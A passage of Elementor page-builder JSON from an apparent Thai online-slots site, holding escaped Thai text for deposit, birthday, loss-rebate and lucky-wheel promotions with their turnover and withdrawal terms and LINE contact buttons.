data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/HBD_-_Megabet333-Biz.webp\",\"id\":159,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Reward_10_-_Megabet333-Biz.webp\",\"id\":160,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Lucky_wheel_-_Megabet333-Biz.webp\",\"id\":156,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong 